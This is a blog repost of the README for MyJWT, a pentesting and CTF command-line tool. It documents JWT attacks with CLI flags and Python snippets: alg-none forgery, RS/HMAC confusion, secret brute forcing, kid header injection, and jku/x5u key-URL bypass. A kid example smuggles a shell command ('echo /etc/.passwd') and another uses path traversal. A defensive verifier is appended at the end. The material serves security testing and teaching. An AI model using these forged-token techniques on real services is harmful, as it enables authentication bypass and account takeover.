MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)
2021-01-17 20:30:00 Author: www.blogger.com

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/s1000/jwt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1000" height="384" src="https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/w640-h384/jwt.jpg" width="640" /></a></div><p><br /></p> <p>This CLI is for pentesters, CTF players, or developers.<br /> You can modify your JWT, sign it, inject headers, etc.<br /> Check the <a href="http://myjwt.readthedocs.io" rel="nofollow" target="_blank" title="Documentation">Documentation</a> for more information.<br /> If you see problems or want an enhancement, open an issue. I will respond as soon as possible. 
Enjoy :)</p><div><br /></div><span style="font-size: x-large;"><b>Documentation</b></span><br /> <p>Documentation is available at <a href="http://myjwt.readthedocs.io" rel="nofollow" target="_blank" title="http://myjwt.readthedocs.io">http://myjwt.readthedocs.io</a></p> <br /><span style="font-size: x-large;"><b>Features</b></span><br /> <ul> <li>Copy the new JWT to the clipboard</li> <li>User interface (thanks <a href="https://github.com/tmbo/questionary" rel="nofollow" target="_blank" title="questionary">questionary</a>)</li> <li>Color output</li> <li>Modify JWT (header/payload)</li> <li>None vulnerability</li> <li>RSA/HMAC confusion</li> <li>Sign a JWT with a key</li> <li>Brute force to guess the key</li> <li>Crack a JWT with a regex to guess the key</li> <li>Kid injection</li> <li>Jku bypass</li> <li>X5u bypass</li> </ul> <br /><span style="font-size: x-large;"><b>Installation</b></span><br /> <p>To install myjwt, simply use pip:</p> <pre><code>pip install myjwt<br /></code></pre> <p>To run myjwt from a docker image, run:</p> <pre><code>docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt<br /><br /># mount volume for wordlist<br />docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt<br /># On Windows<br />docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt<br /></code></pre> <p>To install myjwt from git:</p> <pre><code>git clone https://github.com/mBouamama/MyJWT.git<br />cd ./MyJWT<br />pip install -r requirements.txt<br />python MyJWT/myjwt_cli.py --help<br /></code></pre> <p>To install myjwt on BlackArch:</p> <pre><code>pacman -S myjwt</code></pre> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <div><pre><code>$ myjwt --help<br />Usage: myjwt [OPTIONS] JWT<br /><br /> This cli is for pentesters, CTF players, or dev.<br /> You can modify your jwt, sign, inject ,etc...<br /> Full documentation is at 
http://myjwt.readthedocs.io.<br /> If you see problems or enhancement send an issue.I will respond as soon as possible.<br /> Enjoy :)<br /> All new jwt will be copy to the clipboard.<br /><br />Options:<br /> --version Show the version and exit.<br /> --full-payload TEXT New payload for your jwt.Json format Required.<br /> -h, --add-header TEXT Add a new key, value to your jwt header, if key<br /> is present old value will be replaced.Format:<br /> key=value.<br /><br /> -p, --add-payload TEXT Add a new key, value to your jwt payload, if<br /> key is present old value will be<br /> replaced.Format: key=value.<br /><br /> --sign TEXT Sign Your jwt with key given.<br /> --verify TEXT verify your key.<br /> -none, --none-vulnerability Check None Alg vulnerability.<br /> --hmac PATH Check RS/HMAC Alg vulnerability.<br /> --bruteforce PATH Bruteforce to guess the secret used to sign the<br /> token.<br /><br /> -c, --crack TEXT regex to iterate all string possibilities to<br /> guess the secret used to sign the token.<br /><br /> --kid TEXT Kid Injection sql<br /> --jku TEXT Jku Header to bypass authentication<br /> --x5u TEXT X5u Header to bypass authentication<br /> --crt TEXT For x5cHeader, force crt file<br /> --key TEXT For jku or x5c Header, force private key to<br /> your key file<br /><br /> --file TEXT For jku Header and x5u Header, force file name<br /> --print Print Decoded JWT<br /> -u, --url TEXT Url to send your jwt.<br /> -m, --method TEXT Method use for send request to url.(Default<br /> GET).<br /><br /> -d, --data TEXT Data send to your url.Format: key=value. 
if<br /> value = MY_JWT value will be replace by new<br /> jwt.<br /><br /> -c, --cookies TEXT Cookies to send to your url.Format: key=value.<br /> if value = MY_JWT value will be replace by new<br /> jwt.<br /><br /> --help Show this message and exit.</code></pre></div> <br /><span style="font-size: large;"><b>Modify JWT</b></span><br /> <table> <tbody><tr> <th>Option</th> <th align="center">Type</th> <th align="center">Example</th> <th align="right">Help</th> </tr> <tr> <td>--full-payload</td> <td align="center">JSON</td> <td align="center">{"user": "admin"}</td> <td align="right">New payload for your jwt.</td> </tr> <tr> <td>-h, --add-header</td> <td align="center">key=value</td> <td align="center">user=admin</td> <td align="right">Add a new key, value to your jwt header; if the key is present, the old value will be replaced.</td> </tr> <tr> <td>-p, --add-payload</td> <td align="center">key=value</td> <td align="center">user=admin</td> <td align="right">Add a new key, value to your jwt payload; if the key is present, the old value will be replaced.</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Check Your JWT (HS alg)</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>Help</th> </tr> <tr> <td>--sign</td> <td>text</td> <td>mysecretkey</td> <td>Sign your jwt with your key.</td> </tr> <tr> <td>--verify</td> <td>text</td> <td>mysecretkey</td> <td>Verify your key.</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Exploit</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>Help</th> </tr> <tr> <td>-none, --none-vulnerability</td> <td>Nothing</td> <td></td> <td>Check None Alg vulnerability.</td> </tr> <tr> <td>--hmac</td> <td>PATH</td> <td>./public.pem</td> <td>Check RS/HMAC Alg vulnerability, and sign your jwt with the public key.</td> </tr> <tr> <td>--bruteforce</td> <td>PATH</td> 
<td>./wordlist/big.txt</td> <td>Bruteforce to guess the secret used to sign the token. Use a txt file with one password per line.</td> </tr> <tr> <td>--crack</td> <td>REGEX</td> <td>"[a-z]{4}"</td> <td>Regex to iterate all string possibilities to guess the secret used to sign the token.</td> </tr> <tr> <td>--kid</td> <td>text</td> <td>"00; echo /etc/.passwd"</td> <td>Kid injection (SQL).</td> </tr> <tr> <td>--jku</td> <td>text</td> <td>MYPUBLICIP</td> <td>Jku header to bypass authentication; use --file if you want to change your jwks file name, and --key if you want to use your own private pem.</td> </tr> <tr> <td>--x5u</td> <td>text</td> <td>MYPUBLICIP</td> <td>X5u header to bypass authentication; use --file if you want to change your jwks file name, and --key if you want to use your own private pem.</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Send your jwt</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>Help</th> </tr> <tr> <td>-u, --url</td> <td>url</td> <td><a href="http://challenge01.root-me.org/web-serveur/ch59/admin" rel="nofollow" target="_blank" title="http://challenge01.root-me.org/web-serveur/ch59/admin">http://challenge01.root-me.org/web-serveur/ch59/admin</a></td> <td>Url to send your jwt to.</td> </tr> <tr> <td>-m, --method</td> <td>text</td> <td>POST</td> <td>Method used to send the request to the url (default: GET).</td> </tr> <tr> <td>-d, --data</td> <td>key=value</td> <td>secret=MY_JWT</td> <td>Data sent to your url. Format: key=value. 
If the value is MY_JWT, it will be replaced by your new jwt.</td> </tr> <tr> <td>-c, --cookies</td> <td>key=value</td> <td>secret=MY_JWT</td> <td>Cookies to send to your url. Format: key=value. If the value is MY_JWT, it will be replaced by your new jwt.</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Other</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>Help</th> </tr> <tr> <td>--crt</td> <td>PATH</td> <td>./public.crt</td> <td>For the x5c header, force the crt file.</td> </tr> <tr> <td>--key</td> <td>PATH</td> <td>./private.pem</td> <td>For the jku or x5c header, force the private key to your key file.</td> </tr> <tr> <td>--file</td> <td>text</td> <td>myfile</td> <td>For the jku header, force the file name without the .json extension.</td> </tr> <tr> <td>--print</td> <td>Nothing</td> <td></td> <td>Print the decoded JWT.</td> </tr> <tr> <td>--help</td> <td>Nothing</td> <td></td> <td>Show the help message and exit.</td> </tr> <tr> <td>--version</td> <td>Nothing</td> <td></td> <td>Show the MyJWT version.</td> </tr> </tbody></table> <br /><span style="font-size: x-large;"><b>Examples</b></span><br /> <ul> <li><a href="https://github.com/mBouamama/MyJWT#modify-your-jwt" rel="nofollow" target="_blank" title="Modify Your jwt">Modify Your jwt</a></li> <li><a href="https://github.com/mBouamama/MyJWT#none-vulnerability" rel="nofollow" target="_blank" title="None Vulnerability Check">None Vulnerability Check</a></li> <li><a href="https://github.com/mBouamama/MyJWT#sign-key" rel="nofollow" target="_blank" title="Sign Key">Sign Key</a></li> <li><a href="https://github.com/mBouamama/MyJWT#brute-force" rel="nofollow" target="_blank" title="Brute Force Signature">Brute Force Signature</a></li> <li><a href="https://github.com/mBouamama/MyJWT#rsahmac-confusion" rel="nofollow" target="_blank" title="RSA/HMAC Confusion">RSA/HMAC Confusion</a></li> <li><a href="https://github.com/mBouamama/MyJWT#kid-injection" rel="nofollow" target="_blank" title="Kid Injection">Kid 
Injection</a></li> <li><a href="https://github.com/mBouamama/MyJWT#send-your-new-jwt-to-url" rel="nofollow" target="_blank" title="Send your new Jwt to url">Send your new Jwt to url</a></li> <li><a href="https://github.com/mBouamama/MyJWT#jku-vulnerability" rel="nofollow" target="_blank" title="Jku Vulnerability">Jku Vulnerability</a></li> <li><a href="https://github.com/mBouamama/MyJWT#x5u-vulnerability" rel="nofollow" target="_blank" title="X5u Vulnerability">X5u Vulnerability</a></li> </ul> <br /><span style="font-size: large;"><b>Modify your Jwt</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.modify_jwt import add_header, change_payload<br />from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt<br /><br />jwt = "YOUR_JWT"  # the token to modify<br />jwt_json = jwt_to_json(jwt)  # split into header, payload and signature<br />jwt_json = add_header(jwt_json, {"kid": "001"})<br />jwt_json = change_payload(jwt_json, {"username": "admin"})<br /># re-encode header and payload, keeping the original signature<br />jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py" rel="nofollow" target="_blank" title="01-modify-jwt">01-modify-jwt</a></p> <br /><span style="font-size: large;"><b>None Vulnerability</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --none-vulnerability<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt<br />from myjwt.vulnerabilities import none_vulnerability<br /><br />jwt = "YOUR_JWT"  # the token to test<br />jwt_json = jwt_to_json(jwt)<br /># rebuild the token with alg set to none<br />jwt = none_vulnerability(encode_jwt(jwt_json) + "." 
+ jwt_json[SIGNATURE])<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py" rel="nofollow" target="_blank" title="02-none-vulnerability">02-none-vulnerability</a></p> <br /><span style="font-size: large;"><b>Sign Key</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --sign YOUR_KEY<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.modify_jwt import signature<br />from myjwt.utils import jwt_to_json<br /><br />jwt = "YOUR_JWT"  # the token to re-sign<br />key = "test"  # HMAC secret<br />jwt = signature(jwt_to_json(jwt), key)  # recompute the signature with key<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py" rel="nofollow" target="_blank" title="03-sign-key">03-sign-key</a></p> <br /><span style="font-size: large;"><b>Brute Force</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --bruteforce PATH<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.vulnerabilities import bruteforce_wordlist<br /><br />jwt = "YOUR_JWT"  # HS-signed token to test<br />wordlist = "../../wordlist/common_pass.txt"  # one candidate secret per line<br />key = bruteforce_wordlist(jwt, wordlist)  # try each line as the HMAC secret<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py" rel="nofollow" target="_blank" title="04-brute-force">04-brute-force</a></p> <br /><span style="font-size: large;"><b>Crack</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --crack REGEX<br /></code></pre> <br /><span style="font-size: large;"><b>RSA/HMAC Confusion</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --hmac FILE<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.vulnerabilities import confusion_rsa_hmac<br /><br />jwt = "YOUR_JWT"  # RS-signed token to test<br />file = "public.pem"  # the server's RSA public key<br />jwt = confusion_rsa_hmac(jwt, file)  # re-sign with HMAC using the public key as the secret<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py" rel="nofollow" target="_blank" 
title="05-rsa-hmac-confusion">05-rsa-hmac-confusion</a></p> <br /><span style="font-size: large;"><b>Kid Injection</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --kid INJECTION<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.modify_jwt import signature<br />from myjwt.utils import jwt_to_json<br />from myjwt.vulnerabilities import inject_sql_kid<br /><br />jwt = "YOUR_JWT"  # the token to test<br />injection = "../../../../../../dev/null"  # value written into the kid header<br />sign = ""  # empty secret<br />jwt = inject_sql_kid(jwt, injection)<br />jwt = signature(jwt_to_json(jwt), sign)  # re-sign with the empty secret<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py" rel="nofollow" target="_blank" title="06-kid-injection">06-kid-injection</a></p> <br /><span style="font-size: large;"><b>Send your new Jwt to url</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --none-vulnerability --add-payload "username=admin"<br /></code></pre> <br /><span style="font-size: large;"><b>Jku Vulnerability</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --jku YOUR_URL<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.vulnerabilities import jku_vulnerability<br /><br />jwt = "YOUR_JWT"  # the token to test<br />new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")<br />print(new_jwt)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py" rel="nofollow" target="_blank" title="07-jku-bypass">07-jku-bypass</a></p> <br /><span style="font-size: large;"><b>X5U Vulnerability</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --x5u YOUR_URL<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.vulnerabilities import x5u_vulnerability<br /><br />jwt = "YOUR_JWT"  # the token to test<br />new_jwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")<br />print(new_jwt)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/08-x5u-bypass/x5u-bypass.py" rel="nofollow" 
target="_blank" title="08-x5u-bypass">08-x5u-bypass</a></p> <br /><span style="font-size: x-large;"><b>Download</b></span><br /> <p>Check the GitHub releases. The latest is available at <a href="https://github.com/mBouamama/MyJWT/releases/latest" rel="nofollow" target="_blank" title="https://github.com/mBouamama/MyJWT/releases/latest">https://github.com/mBouamama/MyJWT/releases/latest</a></p> <br /><span style="font-size: x-large;"><b>Contribute</b></span><br /> <ul> <li>Fork this repository or clone it</li> <li>Create a new branch (feature, hotfix, etc.)</li> <li>Make the necessary changes and commit them</li> <li>Check lint with <code>make flake8</code></li> <li>Check the unit tests with <code>make test</code></li> <li>Send a pull request; I will check it as soon as possible.</li> </ul> <br /><span style="font-size: x-large;"><b>Change log</b></span><br /> <p>The log has become rather long. It has moved to its own file.</p> <p>See <a href="https://github.com/mBouamama/MyJWT/blob/master/CHANGELOG.md" rel="nofollow" target="_blank" title="CHANGES">CHANGES</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mBouamama/MyJWT" rel="nofollow" target="_blank" title="Download MyJWT">Download MyJWT</a></span></b></div>Zion3R
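<p>Every check the CLI offers (alg none, RS/HMAC confusion, kid injection, jku/x5u) only succeeds when the verifying side lets the token's own header choose the key or the algorithm. The following is an added example, not MyJWT code: a minimal HS256 verifier using only the Python standard library that selects the key from a local keyring by kid, pins the algorithm to that key, and rejects the token shapes listed above. The keyring, the kid "001", the secret "mysecretkey" and the function names <code>sign_hs256</code> and <code>verify</code> are constructed for this example.</p>

```python
import base64
import hashlib
import hmac
import json

# Constructed keyring for this example: kid -> (pinned algorithm, shared secret).
# Only this table selects the key; alg/jku/x5u in the token header never do.
KEYRING = {"001": ("HS256", b"mysecretkey")}

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a compact JWT; used here only to construct sample tokens."""
    parts = [b64url_encode(json.dumps(p, separators=(",", ":")).encode())
             for p in (header, payload)]
    signing_input = ".".join(parts)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def verify(token: str):
    """Return (True, payload) or (False, reason). Fails closed on anything odd."""
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed token"
    try:
        header = json.loads(b64url_decode(parts[0]))
        signature = b64url_decode(parts[2])
    except Exception:
        return False, "undecodable header or signature"
    if not isinstance(header, dict):
        return False, "header is not a JSON object"
    alg = header.get("alg")
    # "none" in any letter case is the unsigned algorithm: never accept it.
    if not isinstance(alg, str) or alg.lower() == "none":
        return False, "alg none rejected"
    # kid is only a dictionary key: no path, SQL or command is ever built from it.
    kid = header.get("kid")
    if not isinstance(kid, str) or kid not in KEYRING:
        return False, "unknown kid"
    pinned_alg, secret = KEYRING[kid]
    # The algorithm is pinned to the key, so an RSA public key can never be
    # reinterpreted as an HMAC secret (RS/HMAC confusion).
    if alg != pinned_alg:
        return False, "alg does not match key"
    # Keys are never fetched from a URL or certificate named by the token itself.
    if any(h in header for h in ("jku", "x5u", "x5c")):
        return False, "remote key headers not allowed"
    expected = hmac.new(secret, ".".join(parts[:2]).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return False, "bad signature"
    return True, json.loads(b64url_decode(parts[1]))
```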

Source: http://www.blogger.com/feeds/8317222231133660547/posts/default/6633342161631791813